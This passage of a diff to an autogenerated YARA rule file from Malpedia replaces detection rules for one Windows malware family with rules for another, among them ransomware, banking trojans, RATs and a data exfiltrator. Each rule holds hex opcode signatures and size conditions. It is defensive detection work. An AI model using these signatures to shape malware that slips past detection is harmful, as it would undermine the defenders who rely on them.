-		$sequence_9 = { ba???????? 8d0d10b24000 e8???????? ba???????? 8d0d14b24000 }
+		$sequence_0 = { 8945e4 83f805 7d10 668b4c4310 66890c45f8124200 40 ebe8 }
+		$sequence_1 = { 57 8bf8 8b450c 397518 0f86a4000000 8b4508 83c008 }
+		$sequence_2 = { 8b7508 56 c745fc04000000 e8???????? 83c404 837e7010 }
+		$sequence_3 = { d1ff 57 8b7d14 57 }
+		$sequence_4 = { c60700 80780100 7e04 40 8945c4 8a00 3c7f }
+		$sequence_5 = { 8b10 83c40c 51 52 8d4594 50 }
+		$sequence_6 = { 03c9 51 8b4df8 8d1459 52 e8???????? 8b4614 }
+		$sequence_7 = { 85db 0f86f8000000 57 8b7e14 }
+		$sequence_8 = { ff15???????? 6aff 6a00 8bc6 8bcb e8???????? }
+		$sequence_9 = { c645fc01 50 c745f001000000 e8???????? c745fc02000000 bb03000000 57 }
 
 	condition:
-		7 of them and filesize < 1955840
+		7 of them and filesize < 319488
 }
-rule MALPEDIA_Win_Iispy_Auto : FILE
+rule MALPEDIA_Win_Heriplor_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4e322e5f-cd33-52bd-bbf3-6439753e827c"
+		id = "fea80a8c-f479-5ce5-81b4-e326d3255abd"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.iispy"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.iispy_auto.yar#L1-L131"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.heriplor"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.heriplor_auto.yar#L1-L120"
 		license_url = "N/A"
-		logic_hash = "a87fdac5aecf4afd1bb012fec4f493869a7cd5fec753856e83872c6436c79acf"
+		logic_hash = "bcabe5553c3788da5ec383050fc0580bed7efb49f5fdd5cfd8664f6ebd97276a"
 		score = 75
-		quality = 75
+		quality = 73
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87629,32 +87678,32 @@ rule MALPEDIA_Win_Iispy_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 837c242400 8bf8 740c ff742428 e8???????? 83c404 }
-		$sequence_1 = { 03d8 eb49 b8d34d6210 f7e3 8bca 8b5514 c1e906 }
-		$sequence_2 = { 50 8d4110 50 8d4129 50 }
-		$sequence_3 = { 8b048528cf0210 0fb6440828 83e040 5d c3 e8???????? c70009000000 }
-		$sequence_4 = { 84c0 0f8429010000 8b4c2408 83c620 8b01 c1e005 }
-		$sequence_5 = { b81f85eb51 f7eb 5f c1fa05 8bca c1e91f 03ca }
-		$sequence_6 = { 6a01 53 ff15???????? ebe0 b80d000780 5f 5e }
-		$sequence_7 = { 68000000c0 57 ff15???????? 8bf8 83ffff 74c5 8b4dec }
-		$sequence_8 = { 3245f0 32ec 3245e4 3245e0 3245e8 3245d0 3245ff }
-		$sequence_9 = { 50 e8???????? 83a628cf021000 59 83c604 81fe00020000 72dd }
+		$sequence_0 = { 84c9 740d 80c960 01cb }
+		$sequence_1 = { 56 57 33c9 648b4130 8b400c }
+		$sequence_2 = { 7420 46 46 46 46 }
+		$sequence_3 = { 8a08 84c9 740d 80c960 }
+		$sequence_4 = { 8b0491 01f8 5f 5e 89ec 5d c20800 }
+		$sequence_5 = { 43 ebe6 33d2 668b13 }
+		$sequence_6 = { 3b5d0c 7401 40 5b 59 89ec 5d }
+		$sequence_7 = { 5d c20c00 55 89e5 56 57 33c9 }
+		$sequence_8 = { 01fb 8b32 01fe 6a01 ff750c 56 e8???????? }
+		$sequence_9 = { 43 ebe6 33d2 668b13 8b0491 01f8 }
 
 	condition:
-		7 of them and filesize < 397312
+		7 of them and filesize < 49152
 }
-rule MALPEDIA_Win_Stealhook_Auto : FILE
+rule MALPEDIA_Win_Backswap_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "b998f829-6a22-55c4-913b-e54119474a49"
+		id = "0b4784b7-cd96-5e54-a073-0338b4b75481"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.stealhook"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.stealhook_auto.yar#L1-L126"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.backswap"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.backswap_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "50f44fb127afc2237096592b9ec06ad6fce68e47e81e08acb0de7cd16e206d85"
+		logic_hash = "2b5d3806ddf0898828d393c845cc1b722a49353e80ebab2271198eaec3b3ad5a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87668,32 +87717,32 @@ rule MALPEDIA_Win_Stealhook_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 410fb6868e000000 41884705 410fb6868f000000 41884704 410fb68690000000 4188470b 418b8690000000 }
-		$sequence_1 = { e8???????? 48833b00 488d0dd7170500 480f450b }
-		$sequence_2 = { 4a0fbe8419389a0600 428a8c19489a0600 4c2bd0 418b4048 418b52fc d3ea 03c2 }
-		$sequence_3 = { 83e10f 480fbe8411389a0600 8a8c11489a0600 4c2bc0 418b40fc d3e8 4d894708 }
-		$sequence_4 = { 4d8bf8 4c896910 4c8bc6 4c896918 488bee e8???????? 458be5 }
-		$sequence_5 = { 33d2 4903c1 49f7f1 49837e1807 488d0451 498bce 7603 }
-		$sequence_6 = { 488b4590 48634804 4c896c0d90 488b4590 }
-		$sequence_7 = { e8???????? 90 488d542450 48837c24680f 480f47542450 41b8e8030000 488d4c2470 }
-		$sequence_8 = { 66480f6ec8 660f2f25???????? 0f82df000000 48c1e82c 660feb15???????? 660feb0d???????? 4c8d0dd4fd0000 }
-		$sequence_9 = { 4c8b5577 488d05d9350300 0f1000 4c8bd9 488d4c2430 }
+		$sequence_0 = { 33c9 e9???????? b32a 397d14 7412 47 8a07 }
+		$sequence_1 = { f366a5 59 5f 5e c9 c20c00 55 }
+		$sequence_2 = { eb04 8bc6 91 41 5e 5f }
+		$sequence_3 = { 74c4 3c2a 7508 8bdf 897508 4e ebb8 }
+		$sequence_4 = { 33d2 8bdf 4b eb1c 85c9 7508 3bdf }
+		$sequence_5 = { 7482 8b7508 ff4508 8bfb 3bd3 0f8572ffffff 33c9 }
+		$sequence_6 = { 7404 8bce 8bd3 397d14 0f8e99000000 39750c 7e7b }
+		$sequence_7 = { d1e9 f366a5 59 5f 5e }
+		$sequence_8 = { e8???????? 74ed 33c0 eb04 }
+		$sequence_9 = { 33c9 e9???????? b32a 397d14 }
 
 	condition:
-		7 of them and filesize < 1129472
+		7 of them and filesize < 122880
 }
-rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE
+rule MALPEDIA_Win_Cryptoshield_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "13acdf1c-aae7-5f3b-a339-4a965b00f439"
+		id = "f09fd893-35c5-517a-95b1-96dc5c00c268"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.netsupportmanager_rat"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.netsupportmanager_rat_auto.yar#L1-L134"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.cryptoshield"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.cryptoshield_auto.yar#L1-L119"
 		license_url = "N/A"
-		logic_hash = "3b964c7562d1d913c21c0e25b573efbe6d24c01cca1047333434d5efeafe733c"
+		logic_hash = "41afb8e592a261d954078e9828ef943fd5cdbb4b8df8a3f944658b648d1f2323"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87707,32 +87756,32 @@ rule MALPEDIA_Win_Netsupportmanager_Rat_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { e8???????? 8b4530 83c62c 3bf0 7516 8b4538 83c004 }
-		$sequence_1 = { ffd7 68???????? 56 894344 ffd7 8b7508 89431c }
-		$sequence_2 = { e9???????? 8d8d4cffffff e9???????? 8d8dacfeffff e9???????? 8d8d6cffffff e9???????? }
-		$sequence_3 = { e8???????? 83f82a 7520 ba???????? 85d2 7417 6877270000 }
-		$sequence_4 = { ffd7 8b4620 50 ff15???????? 8b4e24 5f 66c741080000 }
-		$sequence_5 = { 8dbe88000000 c745fc06000000 8b07 85c0 7403 50 ffd3 }
-		$sequence_6 = { ff15???????? 5f 33c0 5e c3 68???????? 56 }
-		$sequence_7 = { e8???????? 8b3d???????? 83c418 68???????? 56 ffd7 3bc3 }
-		$sequence_8 = { ff4020 8b7604 8b460c 85c0 740a 8b450c 85c0 }
-		$sequence_9 = { ff5254 83f8ff 0f8517020000 8b4514 8b16 50 57 }
+		$sequence_0 = { 7405 83f804 751a e8???????? }
+		$sequence_1 = { ff15???????? 83c40c 8d85b0edffff 50 683f020f00 }
+		$sequence_2 = { 75cb 66833a00 8bfa 744d 8d4900 }
+		$sequence_3 = { 6a00 8d85e8fbffff 50 6a01 68???????? 56 ff15???????? }
+		$sequence_4 = { 8d85c4f1ffff 68???????? 50 ffd3 }
+		$sequence_5 = { 50 ffd7 8b45f0 85c0 7506 }
+		$sequence_6 = { 0f84a6000000 8d45fc 50 6a01 ff75f8 6810660000 }
+		$sequence_7 = { 6a00 ffd3 85c0 0f84bb000000 6804010000 }
+		$sequence_8 = { ff15???????? c745fc00000000 85f6 7407 56 ff15???????? 85ff }
+		$sequence_9 = { 0fb7c0 50 8d45f4 68???????? 50 ffd6 83c40c }
 
 	condition:
-		7 of them and filesize < 4734976
+		7 of them and filesize < 131072
 }
-rule MALPEDIA_Win_Matrix_Banker_Auto : FILE
+rule MALPEDIA_Win_Postnaptea_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "5e56425b-5f6b-5ff1-8380-5d5609da8da8"
+		id = "51c689b3-106f-5456-8a81-c39f4d1222d0"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.matrix_banker"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.matrix_banker_auto.yar#L1-L111"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.postnaptea"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.postnaptea_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "c882b53f487e75c9405f3f1fd8e8a700ef1f2f55c75fbbd05eae09bdd19de300"
+		logic_hash = "cbc31a40430b61bd28460ce500d3e6052f8e6a6f9e1d2c25674ed00c58ea2b2d"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87746,32 +87795,32 @@ rule MALPEDIA_Win_Matrix_Banker_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 80f905 7705 80c2a9 eb0b 8d4abf 80f905 }
-		$sequence_1 = { 80f905 7704 04a9 eb0a }
-		$sequence_2 = { eb16 8d489f 80f905 7704 }
-		$sequence_3 = { 66890d???????? 66030d???????? 66890d???????? e8???????? }
-		$sequence_4 = { 8d48bf 80f905 7702 04c9 }
-		$sequence_5 = { 8d4abf 80f905 7703 80c2c9 }
-		$sequence_6 = { 8d489f 80f905 7704 04a9 }
-		$sequence_7 = { eb0a 8d48bf 80f905 7702 04c9 8d4ad0 80f909 }
-		$sequence_8 = { 04a9 eb0a 8d48bf 80f905 7702 }
-		$sequence_9 = { 80f905 7705 80c2a9 eb0b 8d4abf }
+		$sequence_0 = { e8???????? ffd0 448bc0 488d542430 488bb590000000 488bce e8???????? }
+		$sequence_1 = { c745c8d4f6ccf6 41bf60090000 c745cc95f695f6 c745d086f6cdf6 c745d4c6f6c7f6 660f1f840000000000 4863c2 }
+		$sequence_2 = { c785060800000af50cf5 c7850a08000012f50ef5 c7850e08000009f505f5 c7851208000003f511f5 c7851608000009f54df5 c7851a0800001af507f5 c7851e08000015f551f5 }
+		$sequence_3 = { c7459418f513f5 c7459819f51bf5 c7459c5ff5baf5 c745a0a1f50000 4533c0 418bd0 660f1f840000000000 }
+		$sequence_4 = { e8???????? 0fb64b08 0fb7430a 663b4509 7416 84c9 750c }
+		$sequence_5 = { c744247c01f516f5 c7458018f515f5 c7458453f517f5 c745881af518f5 c7458c03f51df5 c7459017f50ef5 c7459408f55cf5 }
+		$sequence_6 = { c7451830f51bf5 c7451c0bf5e8f5 c74520eef5e6f5 c74524a3f5e1f5 c74528fdf5e3f5 c7452ce4f5fdf5 c74530fdf5e3f5 }
+		$sequence_7 = { ff15???????? 85c0 7498 83f857 7493 4533c0 418bc8 }
+		$sequence_8 = { ffc3 41b401 488b0f 4885c9 7441 488b4138 4c3928 }
+		$sequence_9 = { ff15???????? 4c8bf0 4885ff 0f84a90a0000 4885c0 0f84a00a0000 c74424400af532f5 }
 
 	condition:
-		7 of them and filesize < 422912
+		7 of them and filesize < 2457600
 }
-rule MALPEDIA_Win_Jasus_Auto : FILE
+rule MALPEDIA_Win_Ghostsocks_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "4b02d02a-6c2f-5b7d-a1b9-9adc3f6ec692"
+		id = "ec83c1b8-972c-5302-8f5c-0348597b2510"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.jasus"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.jasus_auto.yar#L1-L128"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.ghostsocks"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.ghostsocks_auto.yar#L1-L151"
 		license_url = "N/A"
-		logic_hash = "b14ad9069299f53695d1925d28e19a4f9144d4135d3ef376cb647d76db2503c7"
+		logic_hash = "86588affc1ba6a310125c5db73ff776fb8159fe6904364a27563bbbae0b566bf"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87785,32 +87834,38 @@ rule MALPEDIA_Win_Jasus_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 663915???????? 0f8730020000 663915???????? 0f8723020000 663915???????? 0f8716020000 663915???????? }
-		$sequence_1 = { 740f 50 68???????? 56 e8???????? 83c40c 8b45f0 }
-		$sequence_2 = { e8???????? 8b54241c 8bf0 80bb8000000000 c6432d00 7412 }
-		$sequence_3 = { 8bcb 2b4e14 2bc2 3bc8 744e 8b4df8 85c9 }
-		$sequence_4 = { 8d7b1e e8???????? 84c0 7437 a1???????? 8b55f8 }
-		$sequence_5 = { c3 56 33f6 85db 0f889d000000 57 8bf8 }
-		$sequence_6 = { 7474 833b00 756f f644242c01 668954242e 750a }
-		$sequence_7 = { 8b8534feffff 668955c4 8b958cfeffff 6a02 }
-		$sequence_8 = { c1f905 8b0c8d809d4300 c1e006 8d440104 800820 8b4df4 b8000000c0 }
-		$sequence_9 = { 68???????? e8???????? 8b8df8feffff 83c448 51 ff15???????? 83c404 }
+		$sequence_0 = { f7e2 69df90010000 01da 89c3 }
+		$sequence_1 = { f7e2 7079 8d5504 89d5 }
+		$sequence_2 = { f7e2 0fafe9 8b4c2418 0fafcb }
+		$sequence_3 = { f7e2 707d 83f8ff 7772 8b542418 85d2 }
+		$sequence_4 = { f7e2 01d1 81e5ffffff3f 89ea c1fd1f 90 }
+		$sequence_5 = { f7e2 89442468 0fafde 01da }
+		$sequence_6 = { f7e2 83c6f8 90 90 83c308 }
+		$sequence_7 = { f7e2 89442428 01d1 05000096b3 }
+		$sequence_8 = { e8???????? 89856068fcff 89956468fcff 8d8d1bc3faff }
+		$sequence_9 = { e8???????? 89856071fcff 89956471fcff a1???????? }
+		$sequence_10 = { e8???????? 89856077feff 89956477feff 8b8d647ffeff }
+		$sequence_11 = { e8???????? 89856082fcff 89956482fcff 0fb685a77cffff }
+		$sequence_12 = { e8???????? 89856078fbff 89956478fbff 8b0d???????? }
+		$sequence_13 = { e8???????? 8985605ffdff 8995645ffdff 0fb6856fd5faff }
+		$sequence_14 = { e8???????? 89856076fcff 89956476fcff 8b85d0adfdff }
+		$sequence_15 = { e8???????? 89856074fbff 89956474fbff a1???????? }
 
 	condition:
-		7 of them and filesize < 507904
+		7 of them and filesize < 25016320
 }
-rule MALPEDIA_Win_Badflick_Auto : FILE
+rule MALPEDIA_Win_Thumbthief_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "1951cb0e-a0c5-59e1-834b-292c5e2f8f2a"
+		id = "1c9938a2-b3ca-5fff-a79c-43d76c2643f6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.badflick"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.badflick_auto.yar#L1-L122"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.thumbthief"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.thumbthief_auto.yar#L1-L134"
 		license_url = "N/A"
-		logic_hash = "49a5abd3151b3eb74bfd8f8adfc99feeac10f3374c938c8bdf06a9faa4f988f8"
+		logic_hash = "95f6f620d5e728800926363598aae4fbd4980628ff69ddd3ce6426d2d79b4cfc"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87824,32 +87879,32 @@ rule MALPEDIA_Win_Badflick_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 8bd8 ff37 ff15???????? 50 e8???????? 50 ff7508 }
-		$sequence_1 = { ff35???????? ff750c ff75fc ff33 e8???????? 8b7d10 83c418 }
-		$sequence_2 = { 55 8bec ff7508 6a2b }
-		$sequence_3 = { 807d1000 59 5f 5e }
-		$sequence_4 = { be00f00000 56 e8???????? 59 53 8d4df8 51 }
-		$sequence_5 = { 8b4904 03c8 81f9fe34012c 7509 83f805 }
-		$sequence_6 = { 6a3d e8???????? 8bf0 8a4508 59 59 884605 }
-		$sequence_7 = { a5 a5 eb02 33c0 50 6a00 }
-		$sequence_8 = { 8d8548f3ffff 50 ffd7 8d856cf9ffff 50 8d8560f7ffff }
-		$sequence_9 = { a5 a5 e8???????? 59 6a00 }
+		$sequence_0 = { ff7604 e8???????? 83c410 895e04 5f 8bc6 5e }
+		$sequence_1 = { ff7010 e8???????? 0fb74612 8d4dc8 50 68???????? e8???????? }
+		$sequence_2 = { e8???????? c645fc03 85f6 7526 68???????? 68???????? 8d8d2cffffff }
+		$sequence_3 = { e8???????? 8d742440 8d7c2414 a5 8d442414 6a01 50 }
+		$sequence_4 = { e9???????? 8b542434 395608 8b542428 0f85b1000000 8b4c2430 898c24c0000000 }
+		$sequence_5 = { e8???????? 8d8c24bc010000 e8???????? 8d4314 50 68a0000000 53 }
+		$sequence_6 = { ff15???????? 68???????? ff75dc ffd7 50 8d8dd8feffff e8???????? }
+		$sequence_7 = { ff248580c94200 8b4508 b901000000 6689481c 33c0 5f 5e }
+		$sequence_8 = { f20f1045c4 83c408 f20f1187b8010000 8bc6 5f 5e 5b }
+		$sequence_9 = { ff75f4 e8???????? 83c414 8bd6 8bcb e8???????? 837d1000 }
 
 	condition:
-		7 of them and filesize < 81920
+		7 of them and filesize < 4235264
 }
-rule MALPEDIA_Win_Photoloader_Auto : FILE
+rule MALPEDIA_Win_Zhcat_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "8e57491c-6cec-54b0-9e33-36f4eaa437c4"
+		id = "0341c55f-b49b-59ad-9995-dc165ee721c5"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.photoloader"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.photoloader_auto.yar#L1-L174"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.zhcat"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.zhcat_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "2f15d6b5866c53e3831e42ccf3580d949b52efae89debdf96aad0057ebcc65ac"
+		logic_hash = "4527f43b00c94d79075579376bd5c0c607ad5c4bcbb3975ed225c4c4eea50561"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87863,39 +87918,32 @@ rule MALPEDIA_Win_Photoloader_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 0fa2 894704 33c9 b800000040 0fa2 }
-		$sequence_1 = { 8bf7 8d6f10 ff15???????? 0f31 }
-		$sequence_2 = { c0c003 0fb6c8 8bc1 83e10f }
-		$sequence_3 = { ff15???????? 25ffffff00 0d00000005 e9???????? 8bd7 }
-		$sequence_4 = { b800000040 0fa2 895f0c e8???????? }
-		$sequence_5 = { f7411400000020 7407 8b41f8 3901 7714 }
-		$sequence_6 = { 7512 ff15???????? 25ffffff00 0d00000007 eb4a 397b1c 7629 }
-		$sequence_7 = { f7f1 438b4cd314 4803cb 4903c9 418d0411 }
-		$sequence_8 = { 33c9 b801000080 0fa2 0fbae216 7307 }
-		$sequence_9 = { b90b010000 66394a18 8d41ed 448d59fd 440f44d8 4533c9 4c03da }
-		$sequence_10 = { 33ff 2175fc 85ff 751d }
-		$sequence_11 = { 89470c e8???????? 894708 5f 5e 5d 5b }
-		$sequence_12 = { 0fb6c3 8d95e8fdffff f7d8 1bc0 f7d0 25???????? }
-		$sequence_13 = { 57 8bfa ff15???????? 8bac2434010000 25ffffff7f 8b9c2438010000 }
-		$sequence_14 = { 8d461e 50 68???????? 8d1c31 }
-		$sequence_15 = { 8bc8 2bfa 66890c17 46 8d5202 }
-		$sequence_16 = { 6a44 5e 56 33db 8d442424 53 }
+		$sequence_0 = { ff7510 668945c6 ffd7 8b3d???????? 8945c8 8b45fc 33f6 }
+		$sequence_1 = { e8???????? a1???????? 59 803d????????00 }
+		$sequence_2 = { 8d45d4 50 8d45ec 50 33db 8d45f8 }
+		$sequence_3 = { 8bc6 c1f805 8b048540604100 83e61f c1e606 59 c644300400 }
+		$sequence_4 = { 7506 394c2418 742c c705????????01000000 eb20 8b450c }
+		$sequence_5 = { ffd7 6a02 8945d8 58 ff7514 668945c4 ffd6 }
+		$sequence_6 = { c3 8bff 56 57 33ff ffb7004e4100 ff15???????? }
+		$sequence_7 = { 3b04cd20434100 7413 41 83f92d 72f1 }
+		$sequence_8 = { e8???????? 8b45f8 8b4dfc 83c40c 894104 }
+		$sequence_9 = { 7407 68???????? ebd3 39742418 7507 68???????? ebc6 }
 
 	condition:
-		7 of them and filesize < 107520
+		7 of them and filesize < 376832
 }
-rule MALPEDIA_Win_Wormhole_Auto : FILE
+rule MALPEDIA_Win_Bs2005_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "6f46fc51-988b-5f8d-9d00-a7686a2cf87f"
+		id = "c222daf1-0291-5b44-a14d-9520773ee0b6"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.wormhole"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.wormhole_auto.yar#L1-L124"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.bs2005"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.bs2005_auto.yar#L1-L125"
 		license_url = "N/A"
-		logic_hash = "e1e9db1cf90c5ec01e6303b9e0faaa3beb1eeaff1efa494e61bb4a00bebdfa38"
+		logic_hash = "2de8be623d8c0993a0484485024d355fd2aa58f75e717b2fbd75b321c706b20a"
 		score = 75
 		quality = 75
 		tags = "FILE"
@@ -87909,34 +87957,34 @@ rule MALPEDIA_Win_Wormhole_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 56 e8???????? 83c408 8d542410 6aff 6a01 52 }
-		$sequence_1 = { 0f85c1000000 8b15???????? 8d4c2408 51 52 }
-		$sequence_2 = { 6a00 6a00 ffd3 8b1d???????? 6aff 8d4c2414 6a00 }
-		$sequence_3 = { a1???????? 85c0 7531 8b35???????? e8???????? 85c0 7519 }
-		$sequence_4 = { 897c2438 8974243c ffd3 6a00 6a00 89442418 }
-		$sequence_5 = { 6a00 6a00 ff15???????? 85c0 a3???????? 7404 }
-		$sequence_6 = { 6a00 52 68???????? 6a00 6a00 89742430 }
-		$sequence_7 = { 6685c0 743f a1???????? 85c0 7531 }
-		$sequence_8 = { 68c8000000 6a00 56 e8???????? 83c410 83f8ff }
-		$sequence_9 = { 6a01 52 6a02 ffd3 8b35???????? }
+		$sequence_0 = { 40 84c9 75f9 6a00 8d8dccfeffff 51 2bc2 }
+		$sequence_1 = { c705????????14864000 a3???????? c705????????408f4000 c705????????30864000 c705????????92854000 }
+		$sequence_2 = { 8bcf 2bce 81e91c010c00 51 8d5705 52 83c020 }
+		$sequence_3 = { 52 6a04 50 8945e4 8b45e8 68???????? 50 }
+		$sequence_4 = { 8945f8 ba00040000 8bcf c60100 }
+		$sequence_5 = { 8b8e04010000 6a00 6a00 50 51 c745fc00000000 }
+		$sequence_6 = { 8b06 85c0 7425 8b10 50 }
+		$sequence_7 = { 75f9 b900000400 8d860c010c00 c60000 40 49 75f9 }
+		$sequence_8 = { 8b860c010000 3d00000200 7205 b800000200 8b8e04010000 6a00 }
+		$sequence_9 = { 6a00 8d55fc 52 50 8d8612010000 50 51 }
 
 	condition:
-		7 of them and filesize < 99576
+		7 of them and filesize < 212992
 }
-rule MALPEDIA_Win_Hancitor_Auto : FILE
+rule MALPEDIA_Win_Data_Exfiltrator_Auto : FILE
 {
 	meta:
 		description = "autogenerated rule brought to you by yara-signator"
 		author = "Felix Bilstein - yara-signator at cocacoding dot com"
-		id = "816fbcdd-d0a4-5ec6-aee7-dc5bd967236b"
+		id = "9dfe6899-2a2b-53e4-a45a-9d47fab0bd97"
 		date = "2026-01-05"
 		modified = "2026-01-06"
-		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.hancitor"
-		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.hancitor_auto.yar#L1-L255"
+		reference = "https://malpedia.caad.fkie.fraunhofer.de/details/win.data_exfiltrator"
+		source_url = "https://github.com/malpedia/signator-rules//blob/173f2e2012643b57ff6521a58ba6dd57331de3c6/rules/win.data_exfiltrator_auto.yar#L1-L118"
 		license_url = "N/A"
-		logic_hash = "92b7f15d306c0b7e353f23f95c271bcb97f7f829d7a8b924160714a7ac9e4284"
+		logic_hash = "76dad4826c4efcd47bcf7b7baeb8873c247d502d84bcb2a2073a82e8e3d63f8c"
 		score = 75
-		quality = 73
+		quality = 75
 		tags = "FILE"
 		version = "1"
 		tool = "yara-signator v0.6.0"
@@ -87948,49 +87996,32 @@ rule MALPEDIA_Win_Hancitor_Auto : FILE
 		malpedia_sharing = "TLP:WHITE"
 
 	strings:
-		$sequence_0 = { 6a00 6a00 6824040000 6a00 6a00 }
-		$sequence_1 = { 6800010000 6a40 68???????? e8???????? }
-		$sequence_2 = { 750d e8???????? 83c010 a3???????? }
-		$sequence_3 = { 6a20 68???????? 68???????? e8???????? 83c410 }
-		$sequence_4 = { 55 8bec 81ec58010000 6a44 }
-		$sequence_5 = { c745f800000000 c745fc00000000 c745e800000000 6a40 6800300000 8b45f0 50 }
-		$sequence_6 = { 57 8b483c 33f6 03c8 6a40 }
-		$sequence_7 = { 50 c60600 ff15???????? 8b3d???????? }
-		$sequence_8 = { 8b01 2b4234 03450c 8b4de0 8901 8b55f8 83c202 }
-		$sequence_9 = { 8b4dec 8b5150 8955f0 c745f800000000 }
-		$sequence_10 = { 8bec 8b4d08 6a00 6a01 }
-		$sequence_11 = { 8b4508 0fbe08 83f97b 750b 8b5508 83c201 895508 }
-		$sequence_12 = { 8955dc 8b45dc 8b08 894dd8 8b5508 }
-		$sequence_13 = { 83f941 72ed 881d???????? c705????????01000000 }
-		$sequence_14 = { 8b4c1010 51 6b55fc28 8b45f4 8b4d08 034c1014 51 }
-		$sequence_15 = { c745fc00000000 b901000000 85c9 7448 8b5508 }
-		$sequence_16 = { 41 3bc8 72f7 c6043000 40 }
